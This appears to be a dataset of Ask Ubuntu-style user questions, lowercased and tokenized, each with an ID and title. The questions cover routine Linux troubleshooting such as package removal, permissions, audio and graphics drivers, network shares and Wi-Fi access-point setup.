359996	ca n't remove phpmyadmin	i am having great difficulty trying to remove this so i can then start over building a forum . but i made some errors and so have removed some stuff but yet to remove this . this is one of the error messages that i 'm getting trying to remove this : debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable i do n't know what that other process is or how to kill that process . what 's more i also get an error upon entering a password when trying to purge phpmyadmin . if you could help me with this i 'd be very grateful . thanks .
360000	create firebird database in specific directory	i want to be able to create a firebird database in a specific directory . i know that the firebird user needs to have r/w/x permissions to the directory where i want to create the db . i created a group called 'tracker ' and i added my user and the firebird user to that group . firebird @ ubuntu : / $ groups firebird firebird tracker i created a main directory called 'tracker' drwxrwx -- - 3 me tracker 4096 oct 16 10:40 tracker inside the 'tracker ' directory i created an 'fdb ' directory where i want the firebird db 's to be created . drwxrwx -- - 2 firebird firebird 4096 oct 16 11:35 fdb now when i try to create the database using the following command : create database 'localhost : /tracker/fdb/test.fdb ' page_size 8192 user 'sysdba ' password 'foobar ' default character set utf8 ; i get the following error : statement failed , sqlstate = 08001 i/o error during `` open o_creat '' operation for file `` /tracker/fdb/test.fdb '' -error while trying to create file -permission denied if a change the 'tracker ' directory to belong to the 'firebird ' group then it creates the database , which makes sense , but since the firebird user belongs to the 'tracker ' group , it should n't have any permission problems . what am i missing here ? ? i 'm using firebird 2.5 . thanks
360002	how to use gvfs mtp mount from the command line in ubuntu 13.04	when connecting android 3.0+ devices to ubuntu 13.04 file transfers usually work fine in nautilus but using the command line is not at all obvious . no filesystem mount point is apparent and nautilus displays the `` location '' ( usually the mount point ) as something like mtp : // [ usb:002,003 ] / if it displays at all . you can also see the location by executing gvfs-mount -l. under the covers , ubuntu uses gvfs for mounting the mtp filesystem that android exposes . a gvfs mounted mtp share should be accessible from /run/user/ < username > /mtp : host= < encoded string > . however , a gvfs bug in 13.04 ( and likely earlier versions ) will display indecipherable numbers instead of file objects at that location . a newer version of gvfs fixes this problem . execute sudo add-apt-repository ppa : langdalepl/gvfs-mtp sudo apt-get update sudo apt-get dist-upgrade in nautilus unmount and remount your mtp share . the listing under /run/user/ < username > / should now list with proper filenames . hat tip to bessman for where are mtp mounted devices located in the filesystem ? . i filled in some steps that beginners may not know about .
360003	auto-update - > cinnamon and gnome fallback stop working	i 'm running 13.04 , and work in cinnamon . today , i updated everything that was suggested . when the update finished , i restarted . cinnamon crashed , sending me to gnome fallback . gnome fallback worked ok . i figured i might get cinnamon back by running sudo apt-get update & & sudo apt-get dist-upgrade just to make sure that everything is at its latest version . on doing so , gnome fallback breaks -- specifically , moving to a different workspace leads me to a blank screen ( with a mouse ) from which i can do nothing . there are also other bugs -- windows do n't get recognized as such when you right click their upper bars ( for example , to send them to a different workspace ) . i am now working in unity , in which my productivity is quite bad . does this problem sound like a known problem ? any way to fix besides reinstalling ubuntu ?
360004	ubuntu - 12.04 update manager and software center is not working	i have ubuntu 12.04 lts installed in my machine . update manager and software center is not working after applying some packages through update manager . the following is the error trace i got , when i executed the command update-manager on a terminal . i tried to resolved this by reinstalling python once and then upgrading the python to 2.7.4 . but the issue remains same . can anybody please help me on this ? traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 33 , in from updatemanager.updatemanager import updatemanager file `` /usr/lib/python2.7/dist-packages/updatemanager/updatemanager.py '' , line 41 , in import gettext file `` /usr/lib/python2.7/gettext.py '' , line 49 , in import locale , copy , os , re , struct , sys file `` /usr/lib/python2.7/locale.py '' , line 15 , in import encodings file `` /usr/lib/python2.7/encodings/__init__.py '' , line 32 , in importerror : can not import name aliases error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 66 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python2.7/dist-packages/apport/__init__.py '' , line 8 , in import gettext file `` /usr/lib/python2.7/gettext.py '' , line 49 , in import locale , copy , os , re , struct , sys file `` /usr/lib/python2.7/locale.py '' , line 15 , in import encodings file `` /usr/lib/python2.7/encodings/__init__.py '' , line 32 , in importerror : can not import name aliases
360005	internet extremelly slow ubuntu 13.04 alfa awus036h	i have a peculiar problem . presently i have win7 , backtrack 5r3 , and freshly installed ubuntu 13.04 . i have alfa awus036h as my 2nd usb wifi card . both backtrack and this new ubuntu recognize it straightaway and use appropriate driver . when i connect to the internet the connection is slow and sometimes no connectivity at all , but it does n't drop ip address or anything , connected at all times . when i am in windows the the card is flying , never any issue , going fast . but in backtrack & ubuntu it 's incredibly slow . when i try to ping any website , or even my defaul gateway i get like 70-80 percent packet loss . basically when i browse the net it 's way slower than 3g snail . what 's strange is when i use the card in backtrack for pen-testing it works like a charm ! so i know know . thanks for the help .
360010	i have no sound on my realtek alc880 while all is unmuted . how to fix this ?	im new to the community , love it so far but having a sound issue . tried pavucontrol and alsamixer not muted , detects sound but nothing coming out the speakers . card says `` hda intel '' . chip : `` realtek alc880 '' . what can i do ? im thinking its the sound drivers ? how can i check ? what can i download and how do i install ?
360011	hdmi audio not working on fresh dell install	just installed ubuntu on a dell studio 1535 laptop . everything is working except the audio on the hdmi connection ( video via hdmi does work ) . intelâž coreâ˘2 duo cpu t5850 @ 2.16ghz = thats the processor , and i ca n't find anything that indicates there is a seperate graphics card . when i boot to windows vista , it says `` intel graphics '' , so i think it 's all part of the board ? in ubuntu it says the graphics driver is unknown . when i go in to the sound controls in ubuntu , it only lists headphones and internal speakers as audio outputs , with not mention of hdmi . thoughts on how to correct ?
360012	computer wont boot with odd ?	i have ubutunu 12.04 on the disc , burned . i turn on the laptop ( lenovo ) , i click on f12 and i have the following options : sata hdd , sata odd network boot i selected boot odd , then i hear the disc & then it starts windows . why ?
360014	using chrome until dependencies fixed	i am having the same challenge as found here : google chrome update wo n't install due to unmet dependencies . this was encountered from trying to upgrade my system through the update manager . i do not know if it is something i did or the update manager but now when i try to launch chrome i get a dialogue box with a message that says : kdeinit could not launch 'opt/google/chrome/google-chrome' is there a way to roll something back so i can use chrome until these dependency issues are fixed ?
360015	automatically connect headless server running pulseaudio and mpd to bluetooth sound system ( ubuntu 13.10 )	i have a headless server that stores , among other things , my music collection . it runs mpd . next to the server , i have a sound system ( sony bdv n7100 ) which can play back music connected to it via bluetooth ( this is a preferable arrangement , since the audio cable i currently have connected carries too much noise coming from the server ) . i 'd like the server to connect to the sound system automatically when the sound system is turned on so that i can use mpd . so far i have paired with the sound system : bluez-simple-agent hci0 00:11:22:33:44:55 i then added the following to /etc/asound.conf pcm.bluetoothplayer { type bluetooth device 00:11:22:33:44:55 profile âautoâ } if i then run $ bluez-test-audio connect 00:11:22:33:44:55 $ aplay -d bluetoothplayer siegfried.wav i get glorious music . to get it to work with pulseaudio , i then $ pactl load-module module-alsa-sink device=bluetoothplayer $ cat siegfried.wav |pacat which also works . the device name , according to pactl list-sinks is > > > 2 sink ( s ) available . index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 371.52 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc262 analog '' alsa.id = `` alc262 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xfa640000 irq 46 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 27d8 '' device.product.name = `` nm10/ich7 family high definition audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` realtek alc262 '' alsa.components = `` hda:10ec0262,104d1f00,00100100 hda:14f12c06,104d1700,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output-speaker : speakers ( priority 10000 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-speakers '' analog-output-headphones : headphones ( priority 9000 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-headphones '' active port : < analog-output-speaker > * index : 1 name : < alsa_output.bluetoothplayer > driver : < module-alsa-sink.c > flags : hardware decibel_volume latency state : suspended suspend cause : idle priority : 9000 volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 2 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 fixed latency : 139.32 ms module : 21 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` bluetoothplayer '' alsa.id = `` bluetoothplayer '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` bluetoothplayer '' alsa.device = `` 0 '' device.string = `` bluetoothplayer '' device.buffering.buffer_size = `` 24576 '' device.buffering.fragment_size = `` 2048 '' device.access_mode = `` mmap '' device.description = `` bluetoothplayer '' device.icon_name = `` audio-card '' mpd continues produces an error when i try to output over bluetooth with the following settings in /etc/mpd.conf : audio_output { name `` sony blueray player '' type `` pulse '' sink `` alsa_output.bluetoothplayer '' } the error reads : output : `` sony blueray player '' [ pulse ] failed to play : failed to connect the stream : no such entity so , tl ; dr , my problems are : ca n't connect to bluetooth audio player without much manual intervention mpd wo n't output over the bluetooth connection
360017	how do i fix this umask/permission issue on a ntfs drive ?	i set up a new ubuntu laptop , 13.04 , purpose : media download and storage server in a multi-os/device household . i have an ntfs partition called `` storage '' . i 've had all kinds of permission errors , and programs unable to create directories , etc . i read this post and got my ntfs partition working beautifully : setting permission for ntfs partition wherein i was given instructions on umask and fstab . worked great . now i 'm still having problems with external shares . i have twos shares that i can access as graphical ubuntu folders just fine . i click browse network , i click windows network , i click my workgroup name , and click the server name ( having successfully entered the username and password ) , and so on , to the folder i want . i even have them mounted , so they appear on the sidebar . if i drop one of the folders into terminal , it interprets like this : smb : //a300/._share my sickbeard service wants to create folders and move files from my ubuntu machine into this share , into a folder called tv . when configuring sickbeard or similar services , if i try to navigate there via graphical folders , i have to go there like this : /run/user/misterfantastic/gvfs/smb-share : server=a300 , share=share/tv/ my various download services do not like that path or the permissions or both . they complain the locations do n't exist or that they ca n't write to them , you name it . i 'm thinking the way to do this right is to use fstab , and make them so they appear in my media folder . am i right ? i 've tried numerous ways of adding them to fstab but none of them works . i get an error message like this : sudo mount -a mount : wrong fs type , bad option , bad superblock on //10.0.1.3/share , missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount. < type > helper program ) in some cases useful info is found in syslog - try dmesg | tail or so if i run that command i see this : misterfantastic @ dualboot : ~ $ dmesg | tail [ 95366.948432 ] cifs vfs : no username specified [ 95503.366728 ] rpc : registered named unix socket transport module . [ 95503.366731 ] rpc : registered udp transport module . [ 95503.366733 ] rpc : registered tcp transport module . [ 95503.366734 ] rpc : registered tcp nfsv4.1 backchannel transport module . [ 95503.419335 ] fs-cache : netfs 'nfs ' registered for caching [ 95503.457031 ] installing knfsd ( copyright ( c ) 1996 okir @ monad.swb.de ) . [ 95578.021641 ] cifs vfs : no username specified [ 96191.990091 ] cifs vfs : cifs mount error : no usable unc path provided in device string or in unc= option ! [ 96274.660907 ] cifs vfs : cifs mount error : no usable unc path provided in device string or in unc= option ! here 's an example of the line i wrote in fstab : smb : //a300/a300ii /media/misterfantastic/a300 cifs credentials=/home/misterfantastic/.smbcredentials , iocharset=utf8 , sec=ntlm 0 0 and the contents of the credentials file : username=myactualusername password=myactualpassword please help me in fixing this . update : i 'm reading and trying everything i can , but to no avail . i keep bouncing from one error to the next .
360019	unable to update ubuntu 12.04 lts	i have been unable to update my distro for a while now . when i attempt to do so , i get the following message bit : failed to download repository information and then the following details , which is just a small snippet of the giant readout i get every time i attempt an update : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/maverick-backports/main/binary-amd64/packages 404 not found w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/maverick-backports if anyone can help me fix this , i 'd very much appreciate it ; this is maddening .
360020	outlook.com webapp	does outlook.com webapp ( still called live mail , but that is not important ) work even when the browser is not open ? i mean let 's say i close chromium to play a game ; yet i would like to be notified when i receive a new e-mail . can webapps in general work this way ? of course when i want to read the mail , the browser will start . but as far as i can tell , the notifier in the messaging menu works only when browser is running ...
360023	i get this error after upgade . please help	dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.2.1~ ) ; however : version of initramfs-tools-bin on system is 0.103ubuntu0.2 . klibc-utils ( 2.0.1-1ubuntu2 ) breaks initramfs-tools ( < < 0.103 ) and is installed . version of initramfs-tools to be configured is 0.99ubuntu13.2 . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth : plymouth depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing plymouth ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mountall : mountall depends on plymouth ; however : package plymouth is not configured yet . dpkg : error processing mountall ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of initscripts : initscripts depends on mountall ( > = 2.28 ) ; however : package mountall is not configured yet . dpkg : error processing initscripts ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of upstart : upstart depends on initscripts ; however : package initscripts is not configured yet . upstart depends on mountall ; however : package mountall is not configured yet . dpkg : error processing upstart ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of passwd : passwd depends on upstart-job ; however : package upstart-job is not installed . package upstart which provides upstart-job is not configured yet . dpkg : error processing passwd ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : initramfs-tools plymouth mountall initscripts upstart passwd e : sub-process /usr/bin/dpkg returned an error code ( 1 )
360024	can n't install ubntu using wubi	whenever i try to install ubuntu using wubi it takes me to window and after that it says '' could not retrieve the required disk image files . ''
360026	installing objdump on ubuntu that recognizes mach-o binaries ?	anyone know how to install a version binutils on ubuntu that has an objdump that can recognize a mach-o binary ? currently when i run , objdump -p load binary , i get objdump : /path/to/binary : file format not recognized i 've tried installing the binutils-multiarch package , which gave me the same save error . i 've also tried building from source using ./configure -- enable-targets=all ( as recommend by http : //stackoverflow.com/a/10186046/20774 ) . but the resulting binary segfaults . any suggestions ?
360031	/tmp directory : 0 files but shows full ?	related to another post where i was finally able to delete files within /tmp thanks to another poster . however , in the end the sysadmin had to restore a snapshot of a few days ago to get the mysql service back up . i deduced the mysql server was not running , and it was n't . one error was that it could n't write to the tmp dir to create the mysqld.sock/.pid files so they did n't exist . so the server was restarted/rebooted and finally restored from a previous snapshot so all is now working but that snapshot was from a few days ago so the tell-tell signs are in this output : drwxrwxrwt 2 root root 34471936 oct 8 20:47 tmp that big number is still being 'remembered ' somehow and i 'm trying to find out what is writing to that folder ? in drupal , the path for preview files is set to that directory but i just did a series of tests ( the site has no login accounts/just for data ) downloading , previewing etc and the file number never changed on the /tmp folder so what is writing to that folder ? this is a web server which does not get shut down/rebooted unless there 's some problem . even so , the /tmp directory does not get emptied upon restart . also , in the rsc file , the tmptime=0 is still at the default . so , i 'm not sure where else to look or how to investigate what is keeping that 3441936 size when the actual directory is empty ? or , how to search for what processes are using that directory . this is just for a drupal install . ubuntu 12 .
360032	buzzing sound when speaker idle	i just installed ubuntu , and am a new user . there is this constant buzzing noise coming from the speakers , when idle . when i play music , the sound goes away , and i hear the music fine . i tried a few things , but after doing so , the problem is still there and i lost the volume icon from the top right toolbar . : / any suggestions ? the buzzing is irritating beyond belief !
360034	symbolic link error to java / libjvm	all , when trying to install postgresql , i get the following error : /sbin/ldconfig.real : usr/lib/jvm/java-1.7.0-openjdk-amd64/jre/lib/amd64/jamvm/libjvm.so is not a symbolic link i think this is bad ... but thought i 'd reach out in case there was a way to fix it . any thoughts appreciated ! ubuntu 12.04
360038	canâ´t install ubuntu 13.04 desktop	i 'm trying to install ubuntu 13.04 on my pc , the motherboard recognizes the usb , but when the black screen with the white letters appears my display shut down , but the pc is still working . i think it is the video card , but i 'm not sure . how i can fix it ?
360041	ntfs-3g cross-compatibility	i have noticed that ubuntu reads ntfs drives ( due to the ntfs-3g driver i guess ) . my question is : how safe is it to write files to the ntfs volume while in ubuntu 's live cd ? are all the read/write operations safe and transparent ? the question may be dumb , but i want to make sure . i would like to install ubuntu on a partition and leave the other ntfs partitions that i have as they are . i have data on them and i can not move it at the moment . thanks for your feedback !
360047	how to install printer driver for oki mb280 ?	i have an oki mb280 device sitting in front of me . unfortunately , i can not figure out how to install the linux driver package . i installed `` sudo apt-get install libjpeg62 : i386 '' to be able to execute the `` install '' binary for ubuntu . but i can not figure out how and where to configure the printer now . maybe there are files in the package which just need to be place in some directory on ubuntu to get the printer showing up in the printer database . thanks !
360050	b43 driver installation problems	so , i 'm attempting to install the wireless driver for my bc4311 wireless card using the following command : sudo apt-get install firmware-b43-installer but i get to see the following message : unable to locate package firmware-b43-installer any suggestions ?
360052	use variables in nautilus location bar ?	is it possible to use variables ( like $ java_home ) in the nautilus location bar ? i think this will be useful to access certain locations easily .
360058	how can i scan with a printer shared on my ubuntu server ?	i have this ubuntu `` server '' running 12.04 , and everyone on my network can print stuff to it just fine , but then how do people scan from it ? i ca n't seem to figure this out . people primarily scan on the mac in the play room but since i moved it to the living room i dont know how they can scan things anymore . thanks ! anthony
360059	apache2 server static ip	i 'm trying to set apache without my router having a static ip . i have it setup but i ca n't enter my site . how can i make this work ?
360060	another blinking cursor issue ... and no hope	i 've been trying to install ubuntu for the last 3 days and went through dozens of topics but nothing works for me , so this thread is my last hope . i have a laptop tohshiba satellite a215 . few months ago i had ubuntu 12.04 installed on this machine but then i had to format my hard drive and install windows 8 . since that time , no hardware nor bios changed . so now i want to install ubuntu , to have it along with windows . but every time i run installer some problems appear . here is what i tried : starting installation normally - > gets me some strange lines about pnp bios . the last line says `` pnp bios version 1.0 , entry 0xf000 :0x9afb , dseg 0x400 '' starting installation with pnp bios=off - > the same starting installation with nomodeset - > gets me black screen starting installation with nomodeset + acpi=off + noapic - > gets me blinking cursor starting installation with pnp bios=off and i delete quiet splash - > works . the files load , there are some fails , though there 's no time to note them down and finally the installation screen appears . i choose a partition to install the system , click next and again i get black screen or black screen with a blinking cursor . i also tried : running different versions ( 12.04 , 13.04 ) / running both from usb and cd / running from an alternate installer in every case the same things happen . i would really appreciate any ideas ...
360061	can the hp slatebook x2 tegra 4 run ubuntu ?	i would like to buy this ! its small and perfect for travel but i would love to install ubuntu on it so i can do some light weight web developing on the go . what do you guys think ? is this possible , will it be too slow ?
360062	using different drivers for igpu and dgpu	i am building a system using an amd 760g-based motherboard ( uses radeon hd 3000 series igpu ) and an amd radeon hd 7970 for gpgpu via opencl . i plan to use ubuntu 13.04 or 12.04 lts for my operating system . i have researched the catalyst drivers extensively and discovered that the catalyst 13 series does not support the igpu . i would like to run unity and all visuals on the igpu while using the 7970 exclusively for gpgpu . the ultimate goal of this system is to achieve the highest performance per dollar , which is why i would prefer to run visuals on the igpu , if possible . i see a few potential solutions to this : use the open-source radeon driver to drive the igpu while configuring catalyst to handle the dgpu . this is the ideal solution for me . downgrade catalyst to the earliest possible version that supports the 7970 in the hope that it also supports the igpu . problematic because performance likely has improved since that release of catalyst . firstly , are either of these possible ? secondly , how would i configure # 1 ? does # 1 mandate that i manually edit the xorg.conf file ? if so , how do i go about this configuration ?
360063	how to show a running clock in terminal before the command prompt	i prefer to use terminal and spend most of the time using it . i am searching a way to see time in terminal while i use it parallel . the time would change automatically when it passes . it would be awesome if it would display left to my command prompt . if this is my command prompt in terminal : saurav @ saurav-p4i45gx-pe : ~ $ then i would like to see clock ( time ) as : saurav @ saurav-p4i45gx-pe [ 06:27:01 ] : ~ $ or saurav @ ( 06:27:01 ) : ~ $ or any other format . where 06:27:01 is the time . what i want is just to show the time which changes when seconds pass . so is there any way to achieve this ? i will be very happy to get the solution : ) thanks in advance ! !
360067	stock in the partitioning setup	i have a dell xps 14 . intel core i5 , 4 gb ram and nvidia 1 gb , more than enough to install the ubuntu os 13.04 . but every time that i try the one thing that i get its a notification that says something like `` there is no root partitioning '' or something like that . i would be glad if you can help me . by the way , i 'm not able to make another fragmentation of my hard drive because i already have three primary partitions and delete one of them its not an option , so therefore i ca n't make other . thanks .
360070	black screen after ubuntu logo when trying to install at first time	i have a problem regarding the installation of ubuntu at first time . it appears black screen after the ubuntu logo . and i do n't have the option i.e . f1 , f2 , etc
360072	can i `` bring directories with me '' when i ssh into another machine ?	at my university , i ssh into a ubuntu computing cluster to run software such as matlab and mathematica . i like to keep the files that i create on my own ( ubuntu ) machine so that ( 1 ) they are all in one place , and ( 2 ) i can use software on my local machine to edit the files . my current approach is to 1 ) login to the remote machine 2 ) look up my local ip address with ifconfig 3 ) mount the directories i want to work with on the remote machine using sshfs manually typing in my local ip address this works pretty well , but i was wondering is there a way to automate this , or a better approach ? i.e . can i make certain directories like /home/user/classes automatically mount on the remote machine without hassling with my ip address ?
360074	control linux from putty in windows	is it possible to control a linux machine ( edit : like a bash/sudo terminal line ) from putty ( or other ssh/telnet client ) that 's running off another machine and operating system ? i have heard this somewhere before and it seems like a better way to control my server than vnc or rdp ; but i can not find a tutorial online . if it is possible , what would be the connection details ( or you can just point me to a useful tutorial . thanks in advance ! liam
360075	gparted/fdisk gives wrong size for drive	i have an 8gb usb memory stick that i want to format . when i call fdisk -l , i get the following : disk /dev/sdc : 1004.6 gb , 1004611174400 bytes 255 heads , 63 sectors/track , 122137 cylinders , total 1962131200 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000646b0 similarly , gparted lists the drive size as 935.62gib and when i try to create a new partition , the maximum size is listed as 958,071 mib . what could be causing this ? and what can i do to reset whatever defines the size of the drive ?
360077	docky keeps crashing 13.04	the title kind of explains itself . docky will just randomly crash . it will ask if i would like to restart or keep closed , if i try and restart , it wont . its becoming frustrating as i prefer docky over launcher . anyone have a fix for this ? btw i 'm a ubuntu noob ... . thanks in advance for your help .
360080	12.10 random freezes	so hi guys i just got ubuntu 12.10 and it just keeps random freezing from using firefox to just the terminal so i hear i had heard that i have swap my memory how do i do this and can any of this info help ? cat /proc/sys/vm/swappiness 60 then i changed it to 10 using sudo sysctl vm.swappiness=10 also can this be of any help filesystem 1k-blocks used available use % mounted on /dev/loop0 19579768 4170493 15409275 22 % / udev 2010872 4 2010868 1 % /dev tmpfs 808060 872 807188 1 % /run none 5120 0 5120 0 % /run/lock none 2020148 360 2019788 1 % /run/shm none 102400 52 102348 1 % /run/user /dev/sda2 225795068 160536680 65258388 72 % /host
360081	how can i install amd ati catalyst display driver in ubuntu 13.10 64bit ?	hello i was wondering if i can install amd catalyst 13.1 proprietary linux x86 display driver . i am running ubuntu 13.10 beta 64bit and the card in question is listed under the amd radeon hd 3000 series . i have tried the most recent driver and when the computer loads it hangs and never loads so i have to restart in recovery and remove it to boot into my computer . i want 3d acceleration to work is the reason why i am trying to get this to work as well as being able to adjust for overscan problems with my tv . thanks for any help .
360084	omnikey 5321 not sent data in ubuntu 12.04 , why ?	i had install omnikey 5321 usb card reader and it connected in my ubuntu 12.04 but the problem is data from the card reader not sent into system which i use in lotus notes 9.can u help me solve this problem ?
360085	loading of live usb hangs on old pc	i 'm brand new to linux . i created a live usb of ubuntu 12.04 32-bit with universal usb installer . it hangs partway through when it is loading . the last two things seen are : [ 74.920653 ] init : failsafe-x main process ( 2011 ) terminated with status 1 [ 60.892531 ] init : plymouth-stop prestart pocess ( 2170 ) terminated with status 1 since it is an old pc that originally came with windows me , i also tried lubuntu 13.04 . the last two things i saw there are : starting lightdm main process ( 1914 ) terminated with status 1 stopping mount network filesystem • amd athlon 908 mhz cpu • 768mb ram • graphics card is matrox millennium g450 dual head is this the right place for this question ? where is help for beginners , most of the terms are foreign ?
360086	ubuntu 13.04 installation with raid 1	i am trying to install ubuntu 13.04 on ibm system x 3250 m4 with raid 1 . during partitioning . after select manual as the partition method . select the first hard drive , and agree to create a new empty partition table on this device ? . select the free space on the first drive then select create a new partition . select the size of the partition . this partition will be the swap partition , and a general rule for swap size is twice that of ram . enter the partition size , then choose primary , then beginning . at this stage , there is no primary to be chosen from , only the beginning . please give me more instructions .
360087	error - i installed ubuntu 64-bit on a 32-bit system	my problem is this : i want to install ubuntu on a 32-bit netbook and a 64-bit notebook , so what do i do now ? install the 32-bit ? do i have to delete the 64-bit ubuntu on the netbook ? or in the usb installation will i get the option to delete the old one ? i am a new ubuntu user . thanks in advance !
360093	does ubuntu touch support java applet on web pages ?	the only drawback of currently existing mobile operating systems is they have no support for java applet . will ubuntu phone support java applets on web pages ?
360094	ca n't use headphones on compaq presario cq50 running ubuntu 13.04	i just recently installed ubuntu 13.04 on my compaq presario cq50 and it has been running wonderfully . the only issue i have run into so far is that when i plug in a set of headphones , the computer ignores them and continues to play music or other media through the internal speakers . i looked in the sound settings and a headphone jack did not seem to even be listed as an output option , it only shows `` speakers '' and `` hdmi/displayport '' . after researching similar problems , i tried running alsamixer through the terminal to see if the headphones were muted , however they were not and the issue still persisted . as far as i know , all of my drivers and software are up to date . if anybody has any input it would be greatly appreciated , as i am still relatively new to ubuntu and may have overlooked a simple fix .
360096	how do you deal with backports in production ?	i run 12.04 on my production servers . often i will run into a situation where i want the latest version of a certain critical piece of software for a certain role , such as nginx , and often that version is not available for precise . a much older , potentially deprecated version is available instead . often i am able to find a kind soul 's ppa on launchpad that solves the issue , but sometime that just does n't happen . what do i do in situations where no backport can be found ? for example , right now i 'd love to get hold of the latest version of munin and munin-node , but i 'm only able to find a backport of the former . is my only option at this point to download the source and try to make a dpkg out of it , that then i can deploy through configuration management onto my servers ? is there a different or better approach to this ?
360100	problem installing nvidia drivers on ubuntu 12.04 64-bit	i 'm using ubuntu 12.04 on a netbook and it 's really great , so i decided install it on my desktop pc . this desktop has a nvidia gtx 550 , and after installing the 'linux-headers-generic ' and the 'nvidia-current-updates ' everything goes fine , but the problem appears when i reboot the pc , it does n't start on graphical mode . the only way to use the os is by typing ctrl+alt+f1 because when i type ctrl+alt+f7 , it keeps on blinking . i followed many tutorials and read a lot of people who had the same problem and could solve it with other people 's help , but it does n't work for me . i would be very grateful if anybody can help me .
360101	does dell inspiron 15z ( 5523 ) touch screen compatible with ubuntu ?	i 'm considering about buying dell inspiron 15z ( 5523 ) laptop , but i 'm not sure if touch screen of laptop will compatible with ubuntu . also , because i could n't know the model or company of touch screen , i could n't find if it will be compatible with ubuntu . if someone has inspiron 15z with touch screen , could you please give me an answer ? thank you very much : )
360103	make ubuntu as a server and windows their client	i want to add windows user to ubuntu and implement some restrictive policies to windows user . just like making ubuntu or rhel as a server and windows as client .
360105	unable to create ad-hoc using hostapd	i am trying to create my wifi network using the `` create new wireless network '' to make my network detectable to my android device . i typed the following after creating the network ( my hostapd.conf file contains the following : interface=wlan0 driver=nl80211 ssid=myname hw_mode=g channel=11 wpa=1 wpa_passphrase=myphrase wpa_key_mgmt=wpa-psk wpa_pairwise=tkip ccmp wpa_ptk_rekey=600 ) i typed this after creating my hostapd.conf file : sudo hostapd hostapd.conf after this i keep getting the following error : configuration file : hostapd.conf nl80211 : failed to set interface wlan0 into ap mode nl80211 driver initialization failed . eloop : remaining socket : sock=4 eloop_data=0x834a8f8 user_data=0x834ae98 handler=0x807c5e0 eloop : remaining socket : sock=6 eloop_data=0x834cd28 user_data= ( nil ) handler=0x8086770 what can i do to resolve it ?
